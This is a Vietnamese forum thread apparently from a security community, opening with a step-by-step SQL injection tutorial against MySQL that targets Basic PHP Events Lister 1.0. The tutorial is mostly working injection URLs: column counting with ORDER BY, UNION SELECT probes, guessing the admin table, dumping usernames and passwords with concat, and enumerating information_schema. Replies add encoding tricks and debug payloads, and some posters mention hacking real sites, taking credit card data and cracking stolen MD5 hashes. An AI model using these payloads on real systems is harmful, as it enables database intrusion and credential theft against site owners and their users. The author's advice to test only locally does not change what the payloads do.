Latest posts for the topic "Hướng dẫn khai thác SQL Injection đối với MySQL"

Hướng dẫn khai thác SQL Injection đối với MySQL

seamoun — GMT

I. Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1 Thực hiện thêm dấu ' sau id=1. URL trở thành http://seamoun.com/phpevents/event.php?id=1' Ta phát hiện rằng phpvents có lỗi SQL Injection với thông báo sau: Code:

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\phpevents\event.php on line 37

Đối tượng khai thác SQL Injection ở đây là "Basic PHP Events Lister 1.0". Giả sử chúng ta không biết trường và bảng của ứng dụng web này là gì? Với lỗi SQL Injection gây ra bởi URL trên ta xem thử truy vấn (SQL) của nó liệu có bao nhiều trường. Sở dĩ cần xác định điều này bởi vì khi chúng ta dùng UNION trong câu lệnh SQL thì số lượng trường của hai câu lệnh select phải trùng nhau. (Các bạn không rõ vấn đề này thì xem ý nghĩa câu lệnh SQL. Ở đây mình không giải thích vì hiển nhiên phải hiểu rõ SQL mới khai thá được). Xác định có bao nhiêu trường truy vấn với URL http://seamoun.com/phpevents/event.php?id=1 có rất nhiều cách để thực hiện. Ở đây mình sử dụng order by . Thực hiện tăng dần . Khi thực hiện order by , nếu trang web không hiển thị lỗi tức là số lượng trường vẫn còn, thực hiện tăng cho đến khi nào xuất hiện lỗi tức là ta đã thực hiện tìm đủ số lượng trường. Lần lượt mình thử: Code:

http://seamoun.com/phpevents/event.php?id=1 order by 1
 http://seamoun.com/phpevents/event.php?id=1 order by 2
 http://seamoun.com/phpevents/event.php?id=1 order by 3
...

 http://seamoun.com/phpevents/event.php?id=1 order by 15 (<-- Vẫn OK)
 http://seamoun.com/phpevents/event.php?id=1 order by 16 (Xuất hiện lỗi)

Như vậy truy vấn SQL với URL trên là 15 trường (field) Đến đây có thể điều tra phiên bản SQL, user với lệnh sau Code:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,user(),1,1,1,1,1,1,1,1,1,1,1,1,1

Sau khi đã có số lượng trường rồi thì lúc này sẽ tiến hành đoán bảng (table) login của nó: có thể thử với các table thông dụng như manager, admin, administrator, systemlogin, ... (Việc đoán table thuộc về kinh nghiệm, kết hợp với việc crawl, spider nội dung web mà mình khai thác). Nếu như tên bảng không đúng thì khi thực hiện union all select ... nó sẽ thông báo lỗi, ngược lại nếu tên đúng thì nó chạy OK. Tiến hành thử tìm table như sau: Code:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Sau khi đoán được tên table là admin. Tiếp theo là dự đoán tên trường trong bảng admin mà mình đã lấy được. Có thể đoán tên trường trong bảng admin như là username,uname,user, ... pass, passwd, password, pword, .... (Tương tự như trên cũng tùy thuộc vào kinh nghiệm kết hợp với việc crawl, spider nội dung web để tìm tên trường). Tiền hành thử như sau Code:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy trường thứ nhất ta đoán được là uname trong bảng admin. Thực hiện đoán trường mật khẩu

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
 http://seamoun.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy ta đoán được trường mật khẩu là pword. Như vậy ta đã có thông tin đầy đủ để lấy user và pass trong bảng admin với 2 trường uname và pword + tên bảng là admin Thực hiện lệnh: Code:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin.

Thực chất với hai câu lệnh trên thì ta tìm được user và pass nhưng muốn thực hiện lệnh http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin. Để có được tất cả user và pass trong bảng admin. Nếu trường hợp này xuất hiện lỗi ta có thể thêm limit 0,1 và tăng dần limit 1,1 limit 2,1 để lấy hết tất cả user và pass Sở dĩ thực hiện câu lệnh trên để đồng thời lấy uname và pword không cần phải thực hiện 2 lần mới có được uname và pword. 0x3a---> dấu ":". Concat sẽ thực hiện cộng chuỗi Đến đây ta đã có thông tin uname và pword. Nếu trường hợp mà kết nối đến MySQL sử dụng user root thì việc tìm bảng và trường dễ dàng hơn với lệnh sau Code:

Điều tra thông tin bảng:

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables

Điều tra thông tin trường:

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns

Ngoài ra trong một số trường hợp xuất hiện lỗi khi thực hiện khai thác có thể sử dụng hàm convert, hex, ... để không bị lỗi khi khai thác như: http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin II. Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 (milw0rm.com) Đây chỉ là hướng dẫn cơ bản nhất về khai thác SQL - Injection đối với MySQL. Các bạn demo thì install trên máy mình để kiểm tra, đừng đi hack người khác à nha.

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

seamoun — GMT

Trên milw0rm có bài viết (Introduction to SQL injection - gửi ngày 2008-09-28) : http://milw0rm.com/papers/225. Có giới thiệu thêm một số hàm và một số phương thức có thể lấy thông tin về table, column như sử dụng group_concat, ... Các bạn có thể đọc thêm để tham khảo B-)

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

flier_vn — GMT

Em có trường hợp này, mong a e góp ý hướng đi ! Em đã có được password của các user mysql ! Nhưng dạng "localhost@user" vậy ngoài việc mò trùng pass với các thứ khác ra thì còn có hướng nào nữa ko ??? bài viết http://milw0rm.com/papers/225 vẫn chưa có gì mới lạ ! Thx !

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

CK — GMT

Hình như có thêm nhiều cái hay ho trong bảng information_schema của mysql 5 mà anh? Với cả em thấy select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ... không hay bằng select 1,2,3 .... :D

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

louisnguyen27 — GMT

@seamoun như vậy social engineering là rất quan trọng trong việc khai thác lỗi. Có khi nào đoán hoài mà vẫn không ra tên bảng và các trường không?

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

KuNghi — GMT

Tớ có khai thác thì tớ tìm version SQK trước Nếu SQL Version <5 : thì đoán table & column >5 thì truy vấn đến table

information_schema.tables where table_schema=database()

để tìm table :) thôi, cứ vậy tìm đc table thì lấy columns

information_schema.columns where table_name=[ten table]

[ten_table] : cần hex đi :)

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

h0ainiemdauyeu — GMT

lỗi này bây giờ đã fix hết rồi ,kiếm site bị lỗi kiểu này thực tập khó quá :(

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

xnohat — GMT

Ko lẽ cứ thực tập phải kiếm site bị bug ? Để gắn lên dòng hacked by xxx cho nó sướng chăng ?

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

khovingu89 — GMT

lỗi này giờ dính vẫn rất nhiều.......Bao nhiêu công ty việt nam dính chỉ nhưng website cá nhân ai hay lần mò thì ít bị hơn

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

tinios — GMT

mọi người cho em hỏi giả sử em có các bảng như sau Code:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,bangkhen,chitiethd,codong,codong_EN,counter,download,download_EN,hoadon,khachhang,lienhe,link,menudownlo

em sử dụng câu truy vấn http://www.site.com/index.php/id=6 union select 1,2,3,column_name,5 from information_shema.columns where table_name=""-- ==> thì nó báo lổi vậy thì em sai ở bước nào vậy?

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

congrallion — GMT

tinios wrote:

mọi người cho em hỏi giả sử em có các bảng như sau Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,bangkhen,chitiethd,codong,codong_EN,counter,download,download_EN,hoadon,khachhang,lienhe,link,menudownlo
em sử dụng câu truy vấn http://www.site.com/index.php/id=6 union select 1,2,3,column_name,5 from information_shema.columns where table_name=""-- ==> thì nó báo lổi vậy thì em sai ở bước nào vậy?

tớ nghĩ cậu nên hex cái table_name lên thì được á. Code:

......from information_shema.columns where table_name=0x[table_name đã hex]

Re: Hướng dẫn khai thác SQL Injection đối với MySQL

thanhluan13 — GMT

Lỗi này có cách hack lâu rồi mà, cái này ứng dụng vào get shop để lấy cc chùa đây mà. Bây giờ công nhận là nhiều trang còn lỗi này, nhưng sau khi thâm nhập, lấy được thông tin từ Database thì mật khẩu admin bị mã hóa hết. Các thông tin cần bảo mật cũng bị thay thế. VD : 5487921635487= "/////////////". Bác nào đưa ra cách thâm nhập chiếm đoạt toàn quyền thông tin. Dành cho newbie nhé. Thanks !

Hướng dẫn khai thác SQL Injection đối với MySQL

MrKenichi — GMT

firefox cho addons là hackbar rất tiện khi sql injection(inbound) . Load URL và chèn union select column ...

Hướng dẫn khai thác SQL Injection đối với MySQL

nbthanh — GMT

Bài viết rất hay và xúc tích! Đây là 1 ví dụ kinh điển nhất cho - "muốn hack thì phải GIỎI những thứ CĂN BẢN / NỀN TẢNG trước như lập trình, SQL, v.v..." - và "khi đã GIỎI những thứ CĂN BẢN / NỀN TẢNG rồi thì tự nhiên sẽ biết hack" Chẳng hạn như không biết lập trình, không biết SQL, không biết những thứ nền tảng này thì có biết site bị lỗi cũng không biết đường nào mà khai thác.

Hướng dẫn khai thác SQL Injection đối với MySQL

clackent — GMT

có điều này em chưa hiểu là tại sao lúc ta dùng lệnh order by 10 ==true vậy mà khi dùng union select 1,2,3,4,5,6,7,8,9,10-- thì ra The used SELECT statements have a different number of columns. phải chăng cái này thì chỉ dùng blind sql . hình như cái này chỉ có MySQL <5 thì bị đúng không ah.

Hướng dẫn khai thác SQL Injection đối với MySQL

hoahongtim — GMT

MySQL không support multi query, khi bạn order thì nó true, nhưng khi dùng UNION thì có lẽ là không được, với dạng multi query thì có lẽ dùng kỷ thuật blind là hợp lý. MySQLI thì lại có multi query :D

Hướng dẫn khai thác SQL Injection đối với MySQL

khovingu89 — GMT

SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin

Hướng dẫn khai thác SQL Injection đối với MySQL

flier_vn — GMT

khovingu89 wrote:

SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin

:D Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu ! Chân thành đấy ;)

Hướng dẫn khai thác SQL Injection đối với MySQL

quanta — GMT

flier_vn wrote:

khovingu89 wrote:

SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin
:D Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu ! Chân thành đấy ;)

Nên dùng tiếng Việt cho đúng, đừng dùng những từ biến thái như thế (ít ra là trên diễn đàn này). Thật lòng đấy.

Hướng dẫn khai thác SQL Injection đối với MySQL

hoahongtim — GMT

Ai lại chơi chuyện "xúi" người ta hack web này web nọ vậy :D Sao bạn không tự mình làm đi :), còn nếu nhờ ai đó thì nên private message đi :)

Hướng dẫn khai thác SQL Injection đối với MySQL

yeucodon — GMT

ai lại đi phá thế bác seamoun nói rồi mà coó làm thì trên máy mình thôi chứ

Hướng dẫn khai thác SQL Injection đối với MySQL

xichjum — GMT

anh em cho mình hởi có khi nào hack hai trang web cùng kiểu mà lòi ra hai mã được mã hóa khac nhau không.minh hack hai trang ma một mã thì là md5 còn mã kia thi carck nó bằng md5 thì không được anh em có cách nào chỉ dùm mình với thank! 3fa97d17baea21ddfb7e5ba1a8f34e3e nó đây :D :D :D :D :D

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

xichjum wrote:

anh em cho mình hởi có khi nào hack hai trang web cùng kiểu mà lòi ra hai mã được mã hóa khac nhau không.minh hack hai trang ma một mã thì là md5 còn mã kia thi carck nó bằng md5 thì không được anh em có cách nào chỉ dùm mình với thank! 3fa97d17baea21ddfb7e5ba1a8f34e3e nó đây :D :D :D :D :D

Thử tự hỏi "hack cùng một kiểu" có quyết định sự khác nhau của cơ chế hashing trên 2 site khác nhau hay không? Đưa cái hash lên để làm chi vậy?

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

phần lấy password nó ra thế này e8772a36a8f284c2060a70d16cb7d03a và mình đã dùng thử để truy cập nhưng không được chắc là password đã bị mã hóa rồi. vậy làm sao để tìm pass thật đây? các pro giúp dùm. cũng chỉ test chứ không có ý phá người ta.

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

phần lấy password nó ra thế này e8772a36a8f284c2060a70d16cb7d03a và mình đã dùng thử để truy cập nhưng không được chắc là password đã bị mã hóa rồi. vậy làm sao để tìm pass thật đây? các pro giúp dùm. cũng chỉ test chứ không có ý phá người ta.

Chủ đề này là chủ đề "giải mã" hay là chủ đề nói về mysql injection vậy?

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

thì mình không hề nhờ giải mã mà :( ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

thì mình không hề nhờ giải mã mà :( ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)

Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu? 99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả.

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

nói như admin thì theo em hiểu khai thác SQL Injection bây h 99.99999% thu được password được "mã hóa" ? không lẽ cách thâm nhập này đã lỗi thời? newbie có zi ko đúng xin thứ lỗi.

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

nói như admin thì theo em hiểu khai thác SQL Injection bây h 99.99999% thu được password được "mã hóa" ? không lẽ cách thâm nhập này đã lỗi thời? newbie có zi ko đúng xin thứ lỗi.

Cách thâm nhập nào thuộc dạng step-by-step và người thâm nhập không hiểu cấu trúc của ứng dụng mình đang thâm nhập thì lúc nào cũng lỗi thời cả. Ngay cả khi cái "step-by-step" ấy vừa được ra đời, nó đã... lỗi thời.

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ? anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ? mong được chỉ giáo thêm. cám ơn!

Hướng dẫn khai thác SQL Injection đối với MySQL

lyhuuloi — GMT

constructor_87 wrote:

em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ? anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ? mong được chỉ giáo thêm. cám ơn!

Bạn nói đúng :) Nhưng vấn đề bạn lấy được mã md5 rồi mà không biết phải làm gì với nó thì đó là lúc mà bạn phải tìm hiểu về cấu trúc của website đang thâm nhập :) Bạn phải hiểu được cách tạo ra mã md5 đó, ví dụ được md5 mấy lần, mã md5 này có liên quan đến một chuỗi nào đó để tạo ra nó không,... etc. và quan trọng là hack thì phải biết mình cần cái gì,.. giống như kiểu muốn ăn thì lăn vào bếp vậy :D I'm only a newbie, dont hurt me, plz :D

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ? anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ? mong được chỉ giáo thêm. cám ơn!

Bồ nên hiểu thêm thế nào là sql injection và không nên "nghĩ" mà không rõ tính chất của nó. mySQL hoặc bất cứ CSDL nào chỉ là CSDL. Ta truy vấn cái gì, nó trả lời cái nấy. Ta truy vấn sai, nó từ chối cung cấp thông tin. SQL injection xảy bởi vì ứng dụng web "bị" dùng để truy vấn những thứ lẽ ra không nên truy vấn. Đây là lỗi của ứng dụng web chớ chẳng phải lỗi của CSDL bởi vì nó không kiểm soát "cái gì" được dùng để truy vấn đến CSDL. Riêng khoản "cấu trúc của ứng dụng mình đang thâm nhập" thì khoản này khá rộng. Ví dụ, bồ đang thử SQL inject để "mò" lấy thông tin của cột chứa mật khẩu và bồ biết rằng ứng dụng web bồ đang tấn công là vBulletin Forum chẳng hạn. Để hiểu cấu trúc của nó, trước tiên bồ cần có source của vBulletin và nghiên cứu cơ chế tạo và lưu mật khẩu. Nếu biết trước rằng vBulletin hash mật khẩu hai lần bằng MD5 thì có lẽ bồ không phải tốn thời gian để thực hiện SQL Injection để thâu lượm được một mới MD5 hash kia. Điều căn bản nhất cần ghi nhớ: muốn exploit cái gì thì phải nắm vững cái ấy.

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

@lyhuuloi: mới đọc mấy bài của bác bên phần lập trình web ^^! ma em có commen bên blog của bác rồi. mong bác sớm hồi âm :D @conmale: cám ơn bác (ko biết em đủ tuổi chưa :D ) conmale nhiều! em đã thông thoáng hơn rồi :) và em cũng đã và đang thực hiện "Điều căn bản nhất cần ghi nhớ" của bác dặn đây (trong đó nhờ công của bác nhiều đấy ạ ^^! )

Hướng dẫn khai thác SQL Injection đối với MySQL

lyhuuloi — GMT

constructor_87 wrote:

@lyhuuloi: mới đọc mấy bài của bác bên phần lập trình web ^^! ma em có commen bên blog của bác rồi. mong bác sớm hồi âm smilie

Hi, mình đã trả lời lại trên Blog, thanks bạn đã comment, and hope you like it :) Hello HVA :D

Hướng dẫn khai thác SQL Injection đối với MySQL

tinios — GMT

mọi người cho em hỏi trong blind SQL thì làm sao phân biệt được MSSQL và MYSQL vì thường lỗi không xuất ra màn hình

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau? lỗi xuất hiện khi thêm ' sau id : SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\' SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 File : AboutUs.php Line : 100 vậy web đã vá lỗi hay chưa? xin chỉ giáo. cám ơn!

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau? lỗi xuất hiện khi thêm ' sau id : SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\' SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 File : AboutUs.php Line : 100 vậy web đã vá lỗi hay chưa? xin chỉ giáo. cám ơn!

---> quá rõ. Lỗi gì mà vá? Nếu lỗi do mình tạo câu truy vấn sai cú pháp thì... vá cái gì?

Hướng dẫn khai thác SQL Injection đối với MySQL

c0ngit — GMT

msa sao khi muốn test lại lỗi vậy, có phải mạng của mình có vấn đề hay là do site nhỉ :|

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

c0ngit wrote:

msa sao khi muốn test lại lỗi vậy, có phải mạng của mình có vấn đề hay là do site nhỉ :|

Tại sao hỏi một câu không có đầu đũa và vô nghĩa như vậy?

Hướng dẫn khai thác SQL Injection đối với MySQL

Monkey.D.Luffy — GMT

tinios wrote:

mọi người cho em hỏi trong blind SQL thì làm sao phân biệt được MSSQL và MYSQL vì thường lỗi không xuất ra màn hình

Cái này thì theo kinh nghiệm của mình thì đa phần thằng nào xài PHP là dùng MySQL còn ASP, ASP.NET thì MSSQL, còn không thì bác có thể đoán qua function version() (MYSQL) hay @@version (MSSQL).

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

constructor_87 wrote:

nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau? ----------------------------------------------------------------------------------------------------------------------------------- lỗi xuất hiện khi thêm ' sau id : SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\' SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 File : AboutUs.php Line : 100 vậy web đã vá lỗi hay chưa? xin chỉ giáo. cám ơn!

bác conmale ơi! câu hỏi của em chia thành 2 câu riêng biệt, phần trên và dưới gạch ngang ko a/h gì đến nhau ạ! mà trong câu hỏi dưới thì lỗi xuất hiện khi em thêm ' sau id trên url (tại sao lại là truy vấn sai?) cám ơn bác nhiều!

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

constructor_87 wrote:

nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau? ----------------------------------------------------------------------------------------------------------------------------------- lỗi xuất hiện khi thêm ' sau id : SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\' SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 File : AboutUs.php Line : 100 vậy web đã vá lỗi hay chưa? xin chỉ giáo. cám ơn!
bác conmale ơi! câu hỏi của em chia thành 2 câu riêng biệt, phần trên và dưới gạch ngang ko a/h gì đến nhau ạ! mà trong câu hỏi dưới thì lỗi xuất hiện khi em thêm ' sau id trên url (tại sao lại là truy vấn sai?) cám ơn bác nhiều!

2 câu riêng biệt nhưng phần 2 trả lời cho phần 1. Tại sao truy vấn sai? Đọc trang http://dev.mysql.com/doc/.

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

thế bác cho em bỏ câu thứ 2 đi! em chỉ muốn tìm hiểu thế này "nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?" trăm sự nhờ bác ^^! mà link bác cho die ròi >"<

Hướng dẫn khai thác SQL Injection đối với MySQL

conmale — GMT

constructor_87 wrote:

thế bác cho em bỏ câu thứ 2 đi! em chỉ muốn tìm hiểu thế này "nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?" trăm sự nhờ bác ^^! mà link bác cho die ròi >"<

Học để biết SQL là gì rồi hẵng nói đến chuyện SQL Injection.

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu

Hướng dẫn khai thác SQL Injection đối với MySQL

lyhuuloi — GMT

constructor_87 wrote:

thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu

Bác conmale nói đúng mà :) Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn ;) PS: Em thích câu trả lời của bác conmale lắm :D

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

lyhuuloi wrote:

constructor_87 wrote:

thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu
Bác conmale nói đúng mà :) Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn ;) PS: Em thích câu trả lời của bác conmale lắm :D

hỏi là cách học tập nhanh nhất mà.... em đang học chứ có chơi đâu bác lyhuuloi =((

Hướng dẫn khai thác SQL Injection đối với MySQL

seamoun — GMT

constructor_87 wrote:

lyhuuloi wrote:

constructor_87 wrote:

thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu
Bác conmale nói đúng mà :) Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn ;) PS: Em thích câu trả lời của bác conmale lắm :D
hỏi là cách học tập nhanh nhất mà.... em đang học chứ có chơi đâu bác lyhuuloi =((

Theo seamoun thì bạn nên học từ cái căn bản nhất, rồi hãy tính đến chuyện security, hack hiếc này nọ, chứ đừng đụng cái gì cũng hỏi, phải học và làm đi, khi đó nếu có trở ngại thì mới hỏi. Đề nghị không hỏi vu vơ trong chủ đề này nữa ! B-) B-)

Hướng dẫn khai thác SQL Injection đối với MySQL

MrKenichi — GMT

constructor_87 nên so sánh coi khi CSDL là mysql thì nó hiện thông báo lỗi là thế nào , mssql hoặc jet thì thế nào nhưng trước hết muốn sql injection thì phải học căn bản đã SQL là gì ?. Seamoun có cách tip nào hay thủ thuật có thể blind mysql để đoán thông tin table ... nhanh chóng hơn không :) . Cảm ơn nhiều

Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 — GMT

@seamoun: vừa học nhưng cũng vừa ....(hehe...) cho nó đỡ nhạt bác à hii @MrKenichi: chưa biết lỗi của từng loại database như thế nào thì sao mà so sánh hả bác :) tiện cho em test kiến thức về SQL chút :D Code:

SQL query : SELECT * FROM hn_train WHERE N_ID=26 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–' at line 1

File : Trainning.php
Line : 100

=> datbase là SQL server, lỗi là do truy vấn UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES– sai trường và table. em kết luận vấy chuẩn chưa ạ?

Hướng dẫn khai thác SQL Injection đối với MySQL

seamoun — GMT

constructor_87 wrote:

@seamoun: vừa học nhưng cũng vừa ....(hehe...) cho nó đỡ nhạt bác à hii @MrKenichi: chưa biết lỗi của từng loại database như thế nào thì sao mà so sánh hả bác :) tiện cho em test kiến thức về SQL chút :D Code:
SQL query : SELECT * FROM hn_train WHERE N_ID=26 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the [color=#444444][color=red]right syntax to u[/color]se near '1 [/color]TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–' at line 1

File : Trainning.php
Line : 100
